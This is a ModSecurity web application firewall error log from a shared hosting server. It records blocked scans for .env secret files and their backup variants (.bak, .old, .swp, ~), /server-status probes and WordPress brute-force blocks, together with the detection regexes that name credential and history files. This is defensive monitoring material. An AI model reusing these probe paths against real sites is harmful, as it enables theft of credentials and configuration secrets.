[Tue May 26 13:24:43.017421 2026] [security2:error] [pid 512344:tid 512554] [client 94.31.109.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRwsbElyei4S77DQfzCwAAAFA"]
[Tue May 26 13:24:43.389890 2026] [security2:error] [pid 512344:tid 512561] [client 208.84.100.173:50946] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.production.copy"] [unique_id "ahVRw8bElyei4S77DQfzFwAAAFc"]
[Tue May 26 13:24:43.803680 2026] [security2:error] [pid 512344:tid 512601] [client 208.84.100.173:50946] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.bak"] [unique_id "ahVRw8bElyei4S77DQfzIwAAAH8"]
[Tue May 26 13:24:45.113262 2026] [security2:error] [pid 512344:tid 512576] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRxMbElyei4S77DQfzPQAAAGY"]
[Tue May 26 13:24:45.395732 2026] [security2:error] [pid 512344:tid 512577] [client 208.84.100.173:50964] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.local.bak"] [unique_id "ahVRxcbElyei4S77DQfzSQAAAGc"]
[Tue May 26 13:24:45.396514 2026] [security2:error] [pid 512344:tid 512579] [client 208.84.100.173:50934] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.local.backup"] [unique_id "ahVRxcbElyei4S77DQfzSgAAAGk"]
[Tue May 26 13:24:45.397005 2026] [security2:error] [pid 512344:tid 512539] [client 208.84.100.173:50946] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.production.old"] [unique_id "ahVRxcbElyei4S77DQfzTAAAAEE"]
[Tue May 26 13:24:45.397011 2026] [security2:error] [pid 512745:tid 512947] [client 208.84.100.173:50998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.local.old"] [unique_id "ahVRxXKSB_s2CvZg7xNZ1wAAAVI"]
[Tue May 26 13:24:45.602234 2026] [security2:error] [pid 512344:tid 512527] [client 208.84.100.173:56354] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.swp"] [unique_id "ahVRxcbElyei4S77DQfzTwAAADU"]
[Tue May 26 13:24:45.604334 2026] [security2:error] [pid 512745:tid 512929] [client 208.84.100.173:56358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.orig"] [unique_id "ahVRxXKSB_s2CvZg7xNZ2QAAAUA"]
[Tue May 26 13:24:45.606277 2026] [security2:error] [pid 512745:tid 512955] [client 208.84.100.173:56372] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.copy"] [unique_id "ahVRxXKSB_s2CvZg7xNZ2gAAAVo"]
[Tue May 26 13:24:45.607277 2026] [security2:error] [pid 512745:tid 512887] [client 208.84.100.173:56418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.local~"] [unique_id "ahVRxXKSB_s2CvZg7xNZ2wAAARY"]
[Tue May 26 13:24:45.607431 2026] [security2:error] [pid 512745:tid 512916] [client 208.84.100.173:56440] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.production.backup"] [unique_id "ahVRxXKSB_s2CvZg7xNZ3AAAATM"]
[Tue May 26 13:24:45.608111 2026] [security2:error] [pid 512344:tid 512525] [client 208.84.100.173:56408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.local.orig"] [unique_id "ahVRxcbElyei4S77DQfzUQAAADM"]
[Tue May 26 13:24:45.608160 2026] [security2:error] [pid 512745:tid 512914] [client 208.84.100.173:56458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.production.orig"] [unique_id "ahVRxXKSB_s2CvZg7xNZ4AAAATE"]
[Tue May 26 13:24:45.608208 2026] [security2:error] [pid 512745:tid 512881] [client 208.84.100.173:56456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.production~"] [unique_id "ahVRxXKSB_s2CvZg7xNZ3wAAARA"]
[Tue May 26 13:24:45.608230 2026] [security2:error] [pid 512344:tid 512503] [client 208.84.100.173:56406] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.production.bak"] [unique_id "ahVRxcbElyei4S77DQfzUgAAAB0"]
[Tue May 26 13:24:45.608326 2026] [security2:error] [pid 512344:tid 512517] [client 208.84.100.173:56392] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.local.swp"] [unique_id "ahVRxcbElyei4S77DQfzUAAAACs"]
[Tue May 26 13:24:45.608530 2026] [security2:error] [pid 512745:tid 512918] [client 208.84.100.173:56470] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.production.swp"] [unique_id "ahVRxXKSB_s2CvZg7xNZ3QAAATU"]
[Tue May 26 13:24:45.608995 2026] [security2:error] [pid 512344:tid 512479] [client 208.84.100.173:56388] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.local.copy"] [unique_id "ahVRxcbElyei4S77DQfzUwAAAAU"]
[Tue May 26 13:24:45.615689 2026] [security2:error] [pid 512344:tid 512596] [client 208.84.100.173:56316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.old"] [unique_id "ahVRxcbElyei4S77DQfzVAAAAHo"]
[Tue May 26 13:24:45.615833 2026] [security2:error] [pid 512344:tid 512482] [client 208.84.100.173:56300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env.backup"] [unique_id "ahVRxcbElyei4S77DQfzVQAAAAg"]
[Tue May 26 13:24:45.616730 2026] [security2:error] [pid 512344:tid 512507] [client 208.84.100.173:56346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env~"] [unique_id "ahVRxcbElyei4S77DQfzVwAAACE"]
[Tue May 26 13:24:47.498960 2026] [security2:error] [pid 512745:tid 512952] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRx3KSB_s2CvZg7xNZ8gAAAVc"]
[Tue May 26 13:24:49.906101 2026] [security2:error] [pid 512745:tid 512912] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRyXKSB_s2CvZg7xNaEgAAAS8"]
[Tue May 26 13:24:52.012541 2026] [security2:error] [pid 512344:tid 512514] [client 176.65.139.237:50008] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "srsglobalsoft.com"] [uri "/.env"] [unique_id "ahVRzMbElyei4S77DQfznwAAACg"]
[Tue May 26 13:24:52.145529 2026] [security2:error] [pid 512344:tid 512580] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRy8bElyei4S77DQfzmwAAAGo"]
[Tue May 26 13:24:52.148005 2026] [security2:error] [pid 512745:tid 512908] [client 176.65.139.237:50018] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.codealtis.srsglobalsoft.com"] [uri "/.env"] [unique_id "ahVRzHKSB_s2CvZg7xNaOwAAASs"]
[Tue May 26 13:24:52.163572 2026] [security2:error] [pid 512745:tid 512933] [client 176.65.139.235:60534] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.armourin.srsglobalsoft.com"] [uri "/.env"] [unique_id "ahVRzHKSB_s2CvZg7xNaPAAAAUQ"]
[Tue May 26 13:24:53.058112 2026] [security2:error] [pid 512745:tid 512876] [client 176.65.139.233:27880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.financepointaustralia.srsglobalsoft.com"] [uri "/.env"] [unique_id "ahVRzXKSB_s2CvZg7xNaTAAAAQs"]
[Tue May 26 13:24:54.441777 2026] [security2:error] [pid 512745:tid 512984] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRznKSB_s2CvZg7xNaYAAAAXc"]
[Tue May 26 13:24:55.630321 2026] [security2:error] [pid 512344:tid 512493] [client 45.91.64.6:45934] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "208.91.198.65"] [uri "/server-status"] [unique_id "ahVRz8bElyei4S77DQfz0QAAABM"]
[Tue May 26 13:24:55.680478 2026] [fcgid:warn] [pid 512344:tid 512482] (70014)End of file found: [client 176.32.193.16:57326] mod_fcgid: can't get data from http client
[Tue May 26 13:24:56.755893 2026] [fcgid:warn] [pid 512344:tid 512545] (70014)End of file found: [client 176.32.193.16:57338] mod_fcgid: can't get data from http client
[Tue May 26 13:24:56.818640 2026] [security2:error] [pid 512344:tid 512514] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR0MbElyei4S77DQfz7QAAACg"]
[Tue May 26 13:24:59.113817 2026] [security2:error] [pid 512344:tid 512529] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR0sbElyei4S77DQf0CwAAADc"]
[Tue May 26 13:25:00.039026 2026] [security2:error] [pid 512344:tid 512560] [client 185.255.126.23:25507] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVR08bElyei4S77DQf0GwAAAFY"], referer: https://www.glorodrc.com/index.php?route=information/contact
[Tue May 26 13:25:00.865827 2026] [security2:error] [pid 512344:tid 512506] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR1MbElyei4S77DQf0JQAAACA"]
[Tue May 26 13:25:03.136062 2026] [security2:error] [pid 512745:tid 512937] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR1nKSB_s2CvZg7xNatQAAAUg"]
[Tue May 26 13:25:06.136523 2026] [security2:error] [pid 512745:tid 512882] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR2XKSB_s2CvZg7xNa6QAAARE"]
[Tue May 26 13:25:07.976041 2026] [security2:error] [pid 512344:tid 512500] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR28bElyei4S77DQf0gAAAABo"]
[Tue May 26 13:25:08.288508 2026] [security2:error] [pid 512745:tid 512992] [client 14.176.50.77:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR23KSB_s2CvZg7xNbFgAAAX8"]
[Tue May 26 13:25:09.711274 2026] [security2:error] [pid 512344:tid 512596] [client 45.91.64.6:57104] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "208.91.198.65"] [uri "/server-status"] [unique_id "ahVR3cbElyei4S77DQf0oQAAAHo"]
[Tue May 26 13:25:09.717735 2026] [fcgid:warn] [pid 512344:tid 512579] (70014)End of file found: [client 45.91.64.8:46152] mod_fcgid: can't get data from http client
[Tue May 26 13:25:10.464963 2026] [fcgid:warn] [pid 512745:tid 512978] (70014)End of file found: [client 45.91.64.8:46166] mod_fcgid: can't get data from http client
[Tue May 26 13:25:10.855958 2026] [security2:error] [pid 512745:tid 512944] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR3nKSB_s2CvZg7xNbLQAAAU8"]
[Tue May 26 13:25:11.395795 2026] [security2:error] [pid 512344:tid 512378] [remote 74.7.241.58:52230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVR38bElyei4S77DQf0uwAAAiE"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:25:13.174083 2026] [security2:error] [pid 512344:tid 512521] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR4MbElyei4S77DQf0zgAAAC8"]
[Tue May 26 13:25:14.624935 2026] [security2:error] [pid 512745:tid 512879] [client 170.199.224.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVR4XKSB_s2CvZg7xNbWAAAAQ4"], referer: https://www.anujtradingco.com/
[Tue May 26 13:25:15.150175 2026] [security2:error] [pid 512745:tid 513000] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR4nKSB_s2CvZg7xNbdAAAAYc"]
[Tue May 26 13:25:16.161378 2026] [security2:error] [pid 512344:tid 512552] [client 170.199.224.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVR5MbElyei4S77DQf0-wAAAE4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1225630&moderation-hash=1c91b5c556a43bd9bd7586e495750589
[Tue May 26 13:25:16.288278 2026] [security2:error] [pid 512745:tid 512911] [client 193.142.103.245:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVR4nKSB_s2CvZg7xNbcAAAAS4"]
[Tue May 26 13:25:16.737223 2026] [security2:error] [pid 512745:tid 512896] [client 176.65.139.231:17116] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.usteve.com.svijaykumar.in"] [uri "/.env"] [unique_id "ahVR5HKSB_s2CvZg7xNbkwAAAR8"]
[Tue May 26 13:25:17.953302 2026] [security2:error] [pid 512745:tid 512834] [remote 91.134.89.60:49732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVR5XKSB_s2CvZg7xNbpAABL1g"]
[Tue May 26 13:25:17.988979 2026] [security2:error] [pid 512745:tid 512977] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR5XKSB_s2CvZg7xNboAAAAXA"]
[Tue May 26 13:25:18.214298 2026] [security2:error] [pid 512745:tid 512998] [client 49.13.164.148:56098] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVR5XKSB_s2CvZg7xNbogAAAYU"], referer: http://ucdc.co.in/
[Tue May 26 13:25:19.532334 2026] [security2:error] [pid 512745:tid 512993] [client 170.199.224.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVR53KSB_s2CvZg7xNbxAAAAYA"], referer: https://anujtradingco.com
[Tue May 26 13:25:20.455753 2026] [security2:error] [pid 512344:tid 512584] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVR6MbElyei4S77DQf1IgAAAG4"]
